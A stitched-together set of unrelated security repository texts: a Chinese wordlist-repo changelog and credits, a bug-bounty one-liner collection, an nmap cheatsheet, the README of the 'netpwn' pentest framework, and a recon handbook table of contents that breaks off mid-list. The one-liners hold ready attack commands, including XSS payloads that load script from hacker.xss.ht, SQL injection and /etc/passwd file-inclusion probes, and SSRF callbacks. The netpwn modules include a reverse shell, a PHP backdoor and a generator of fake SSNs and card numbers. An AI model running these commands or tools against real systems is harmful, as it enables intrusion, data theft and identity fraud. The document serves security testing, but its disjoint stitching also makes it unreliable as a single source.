**2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## 来源&致谢 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass) * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://github.com/lutfumertceylan/top25-parameter](https://github.com/lutfumertceylan/top25-parameter) * [https://github.com/clarkvoss/AEM-List](https://github.com/clarkvoss/AEM-List) * [https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb](https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb) * [https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md](https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md) * [https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json](https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json) * [https://github.com/fuzz-security/SuperWordlist](https://github.com/fuzz-security/SuperWordlist) * [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) * [https://github.com/yuanhaiGreg/Fuzz-Dict](https://github.com/yuanhaiGreg/Fuzz-Dict) * [https://github.com/MistSpark/DNS-Wordlists](https://github.com/MistSpark/DNS-Wordlists) * [https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf](https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf) * [https://github.com/omurugur/OS_Command_Payload_List](https://github.com/omurugur/OS_Command_Payload_List) * [https://github.com/akamai-threat-research/mqtt-pwn](https://github.com/akamai-threat-research/mqtt-pwn) * [https://github.com/BlackFan/cspp-tools](https://github.com/BlackFan/cspp-tools) * [https://github.com/augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks)
# oneliner commands for bug bounties ## Find Subdomain > projectdiscovery ```bash subfinder -d target.com -silent | httpx -silent -o urls.txt ``` ## Search Subdomain using Gospider > https://github.com/KingOfBugbounty/KingOfBugBountyTips/ ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ## find .git/HEAD > @ofjaaah ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ## Check .git/HEAD > @ofjaaah ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ## Find XSS > cihanmehmet ### Single target ```bash gospider -s "https://www.target.com/" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt ``` ### Multiple target ```bash gospider -S urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt ``` ## Find XSS > dwisiswant0 ```bash #/bin/bash hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://your.xss.ht # save to .sh, and run bash program.sh target.com ``` ## Kxss to search param XSS > [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ## XSS hunting multiple > @ofjaaah ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ## BXSS - Bling XSS in Parameters > [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/) ```bash subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters ``` ## Blind XSS In X-Forwarded-For Header > [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/) ```bash subfinder -d target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For" ``` ## Gxss with single target > @KathanP19 ```bash echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe ``` ## XSS using gf with single target > @infosecMatter ```bash echo "http://testphp.vulnweb.com/" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf xss | anew ``` ## XSS without gf > HacktifyS ```bash waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done ``` `or` ```bash gospider -S target.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done ``` ## XSS qsreplace > @KingOfBugBounty ```bash gospider -a -s https://site.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ## XSS httpx > @ofjaah ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo "(http|https)://[^/"].* | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" ``` ## Automating XSS using Dalfox, GF and Waybackurls > [Automating XSS using Dalfox, GF and Waybackurls](https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75) ```bash cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht) ``` ## XSS from javascript hidden params > @0xJin ```bash assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars" ``` ## XSS freq > @ofjaaah ```bash echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq ``` ## Find xss > @skothastad ```bash cat targets | waybackurls | anew | grep "=" | gf xss | nilo | Gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403 ``` > @mamunwhh ```bash cat hosts.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)" ``` > @SaraBadran18 ```bash cat domainlist.txt | subfinder | dnsx | waybackurl | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b your.xss.ht -o xss.txt ``` ## Find XSS + knoxss > @ofjaaah ```bash echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh ``` ## Dump In-Scope Assests from Bounty Program ### BugCrowd Programs > @dwisiswant0 ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' ``` ## Recon.dev > @ofjaaah ```bash curl "https://recon.dev/api/search?key=YOURAPIKEY&domain=target.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ## Jaeles scan to bugbounty targets. > @KingOfBugbounty ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` > @ofjaah ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ## Nuclei scan to bugbounty targets. > @hack_fish ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | httpx -silent | xargs -n 1 gospider -o output -s ; cat output/* | egrep -o 'https?://[^ ]+' | nuclei -t ~/nuclei-templates/ -o result.txt ``` > @ofjaah ```bash amass enum -passive -norecursive -d https://target.com -o domain ; httpx -l domain -silent -threads 10 | nuclei -t nuclei-templates -o result -timeout 30 ``` ## Endpoints, by apks > @ofjaaah ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|http://schemas.android\|google\|http://goo.gl" ``` ## Find Subdomains TakeOver > hahwul ```bash subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; ``` ## CORS Misconfiguration > manas_hunter ```bash site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done ``` ## SQL Injection > @ofjaaah ```bash findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1 ``` ## Search SQLINJECTION using qsreplace search syntax error > [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ## SQLi-TimeBased scanner > @slv0d ```bash gau DOMAIN.tld | sed 's/=[^=&]*/=YOUR_PAYLOAD/g' | grep ?*= | sort -u | while read host;do (time -p curl -Is $host) 2>&1 | awk '/real/ { r=$2;if (r >= TIME_OF_SLEEP ) print h " => SQLi Time-Based vulnerability"}' h=$host ;done ``` ## Recon to search SSRF Test > [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ## Using shodan & Nuclei > [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ## Using Chaos to jaeles "How did I find a critical today?. > [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` edited **if we don't have chaos api_key** ```bash cat domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s ~/Tools/jaeles-signatures -u @ ``` ## Check Blind ssrf in Header,Path,Host & check xss via web cache poisoning. > @sratarun ```bash cat domains.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.yourburpcollabrotort'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.yourburpcollabrotort'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.yourburpcollabrotort'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaborator/ --max-time 2); echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.yourburpcollabrotort HTTP/1.1 ""\n";done\ ``` ### Local File Inclusion > @dwisiswant0 ```bash gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' ``` ### Open-redirect > @dwisiswant0 ```bash export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' ``` ## Directory Listing ### (Feroxbuster) common command ```bash feroxbuster -u https://target.com --insecure -d 1 -e -L 4 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt ``` ### (Feroxbuster) Multiple values > @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster) ```bash feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx ``` ### (Feroxbuster) Read urls from STDIN; pipe only resulting urls out to another tool > @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster) ```bash cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files ``` # search javascript file > @ofjaaah ```bash gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ``` # Uncover > [projectdiscovery/uncover](https://github.com/projectdiscovery/uncover) ```bash uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei uncover -q target -f ip | naabu echo jira | uncover -e shodan,censys -silent ``` > @ofjaah ```bash uncover -q 'org:"DoD Network Information Center"' | httpx -silent | nuclei -silent -severity low,medium,high,critical ``` # Find admin login > @0x_rood ```bash cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin" ``` # 403 login Bypass > @_bughunter ```bash cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent ``` # Recon Parameters ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ```
--- description: nmap cheatsheet --- # Nmap ## Tool ### Scope ``` nmap <host list> nmap -6 <host list> nmap -iL <path to file>.txt nmap <host list> --exclude <host list> ``` ### Host discovery ``` -sL No Scan. List targets only -sn Disable port scanning. Host discovery only. -Pn Disable host discovery. Port scan only. -PS TCP SYN discovery on port x. Port 80 by default -PA TCP ACK discovery on port x. Port 80 by default -PU Port 40125 by default -PR ARP discovery on local network -n Never do DNS resolution ``` ### Scan options ``` -sS TCP SYN port scan (Default) -sT TCP connect port scan (Default without root privilege) -sU UDP port scan (Can be combined with other scan options) -sA TCP ACK port scan -sW TCP Window port scan -sM TCP Maimon port scan -sN TCP NULL port scan -sF TCP FIN port scan -sX TCP Xmas port scan -sY SCTP INIT scan -sZ COOKIE-ECHO scan ``` ### Version & OS ``` -sV Attempts to determine the version of the service running on port -sV --version-light Enable light mode. Lower accuracy. Faster -sV --version-all Higher accuracy. Slower -O Remote OS detection using TCP/IP stack fingerprinting -O --osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection -O --osscan-guess Makes Nmap guess more aggressively -A Traceroute, version and OS scan ``` ### Ports ``` -p Use port range, protocol or mixed i.e. T:443,U:1040 -p 1-65535 All ports --top-ports Most used ports -F Top 100 ports ``` ### Evasion ``` -f Requested scan (including ping scans) use tiny fragmented IP packets --mtu Set your own offset size -D Send scans from spoofed IPs -S Spoof host (-e eth0 -Pn may be required) --spoof-mac Spoof NMAP MAC address --badsum Send packets with a bogus TCP/UDP/SCTP checksum -g Use given source port number --proxies Relay connections through HTTP/SOCKS4 proxies --data-length Appends random data to sent packets ``` ### Output ``` -oN File.txt -oX File.xml -oG Grepable -oA Output in the three major formats at once ``` ## Templates #### Common services slow ``` nmap -Pn -p 21,22,25,53,80,110,111,143,443,445,1433,1521,3306,5432,8080,8443 -T2 <ip> -A -vvv -oA ./nmap ``` #### Service detailed scan ``` nmap -Pn -p <port> <ip> -sV --version-all -sC -vvv -oA ./nmap ``` #### Full scan ``` nmap -Pn -p- <ip> -sV --version-all -A -vvv -oA ./nmap ``` #### Light scan ``` nmap -Pn --top-ports 500 <ip> -vvv -oA ./nmap ``` #### Machine discovery ``` nmap -PR -T2 --top-ports 100 <ip> -vvv -oA ./nmap ``` #### Machine discovery no scan ``` nmap -PR -T2 -sn <ip> -vvv -oA ./nmap ```
# netpwn A framework made to automate tasks of pentesting. Written in python 2.7 <br /> __Modules__ <br /> reverse_shell - Creates a reverse shell with python to connect to a specific machine of your choice. <br /> send_file - Allows you to send a file to target server. <br /> php_backdoor - Generates a simple backdoor in php upload to web server ?cmd= to execute commands. <br /> hash_check - Paste a hash to see what type of hash it is. <br /> base64_converter - Paste base64 to decode or ascii to encode it knows which you want. <br /> address_info - Gives you your ipv4, ipv6, and public Ip address based upon a interface. <br /> hex_converter - Paste some ascii to encode or hex to decode it knows which you want. <br /> page_contents - Get the raw HTML of a given web page. <br /> password_checker - Check the strength of a given password. <br /> fake_identity - Creates a fake name with SSN, address, credit card number, etc. <br /> web_spider - Crawls a given URL for links. <br /> ssl_cert - Gets the cert information of a given web site and its public key. <br /> bash - Execute bash commands without exiting out of netpwn. <br /> whois - Performs whois on a given URL. <br /> crypto - Encrypts or decrypts a file with AES. <br /> no_endian - Removes endianness on DWORDS. <br /> rot13_converter - Encodes/decodes rot13. <br /> url_converter - Url encoded and decodes string. <br /> html_converter - Html enconded and decodes string. __Resources__ <br /> cheat_sheet - Pentest monkey reverse shell cheat sheet <br /> opcodes - Prints out all x86 OpCodes. <br /> useful_links - Links to blogs, youtube channels, and other resources that offer good information about various topics that gives you the opportunity to learn more about the infosec field. __Usage__ <br /> To run a specific module just type module name. <br /> For example to run php_backdoor the command should look like this. <br /> (netpwn) > php_backdoor __Features__ <br /> AutoComplete - Type a few letters of the command you want and hit tab to for auto completion. <br /> clear - Type this to clear the screen. <br /> banner - Type this command to display the banner. <br /> help - Type this command to display help menu. <br /> modules - Type this command to list available modules. <br /> resources - Type this command to list available resources. <br /> exit or CTRL^C - Exits netpwn [![netpwn](https://github.com/3XPL017/netpwn/blob/master/images/netpwn.png) [![modules](https://github.com/3XPL017/netpwn/blob/master/images/modules.png) [![help and resources](https://github.com/3XPL017/netpwn/blob/master/images/resources.png) ### Install #git clone https://github.com/3XPL017/netpwn.git; cd netpwn; chmod +x install; ./install ### Twitter https://twitter.com/3XPL017GH057
# Information Collection For Pentest SRC ## 声明 ``` Author:Qftm Data:2020/01/18 ProjectAddress:https://github.com/Qftm/Information_Collection_Handbook GitbookAddress:https://qftm.github.io/Information_Collection_Handbook/ ``` ## 正文 "只有不努力的黑客,没有攻不破的系统"。 在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。 项目已整理Gitbook文档,方便阅览:[Information Collection Handbook](https://qftm.github.io/Information_Collection_Handbook/ ) ![image-20200417210840456](img/image-20200417210840456.png) 感谢:@cckuailong师傅由此项目整理的SRC资产信息收集聚合网站:http://lovebear.top/info/ Table of Contents ================= - [收集域名信息](#收集域名信息) - [Whois 查询](#whois-查询) - [备案信息查询](#备案信息查询) - [信用信息查询](#信用信息查询) - [IP反查站点的站](#ip反查站点的站) - [在线网站](#在线网站) - [Dnslytics](#dnslytics) - [浏览器插件](#浏览器插件) - [myip.ms](#myip.ms) - [TCPIPUTILS](#tcpiputils) - [DNSlytics](#dnslytics-1) - [收集相关应用信息](#收集相关应用信息) - [微信公众号&微博](#微信公众号微博) - [天眼查](#天眼查) - [APP](#app) - [七麦数据](#七麦数据) - [AppStore](#appstore) - [收集子域名信息](#收集子域名信息) - [在线平台](#在线平台) - [第三方平台查询](#第三方平台查询) - [权重综合查询](#权重综合查询) - [全国政府网站基本数据库](#全国政府网站基本数据库) - [IP反查绑定域名网站](#ip反查绑定域名网站) - [资产搜索引擎](#资产搜索引擎) - [Google语法查询](#google语法查询) - [FOFA语法查询](#fofa语法查询) - [工具枚举](#工具枚举) - [OneForAll](#oneforall) - [Layer](#layer) - [subDomainsBrute](#subdomainsbrute) - [Sublist3r](#sublist3r) - [证书透明度公开日志枚举](#证书透明度公开日志枚举) - [在线第三方平台查询](#在线第三方平台查询) - [工具枚举查询](#工具枚举查询) - [Findomain](#findomain) - [DNS历史解析](#dns历史解析) - [DNS域传送漏洞](#dns域传送漏洞) - [DNS记录分类](#dns记录分类) - [DNS注册信息](#dns注册信息) - [DNS域传送漏洞原理](#dns域传送漏洞原理) - [DNS域传送漏洞检测](#dns域传送漏洞检测) - [nslookup](#nslookup) - [nmap](#nmap) - [dig](#dig) - [查找真实IP](#查找真实ip) - [CDN简介](#cdn简介) - [国内外CDN](#国内外cdn) - [判断目标是否存在CDN](#判断目标是否存在cdn) - [Ping目标主域](#ping目标主域) - [Nslookup](#nslookup-1) - [不同DNS域名解析](#不同dns域名解析) - [nslookup默认解析](#nslookup默认解析) - [全国Ping](#全国ping) - [站长工具](#站长工具) - [17CE](#ce) - [IPIP](#ipip) - [工具查询](#工具查询) - [Cdnplanet](#cdnplanet) - [绕过CDN查找真实IP](#绕过cdn查找真实ip) - [内部邮箱源](#内部邮箱源) - [国外请求](#国外请求) - [国际Ping](#国际ping) - [国外DNS解析](#国外dns解析) - [分站域名&C段查询](#分站域名c段查询) - [分站域名](#分站域名) - [C段查询](#c段查询) - [网站漏洞](#网站漏洞) - [一些测试文件](#一些测试文件) - [SSRF漏洞](#ssrf漏洞) - [查询域名解析记录](#查询域名解析记录) - [目标网站APP应用](#目标网站app应用) - [网络空间引擎搜索](#网络空间引擎搜索) - [收集常用端口信息](#收集常用端口信息) - [常见端口&解析&总结](#常见端口解析总结) - [扫描工具](#扫描工具) - [常用扫描工具](#常用扫描工具) - 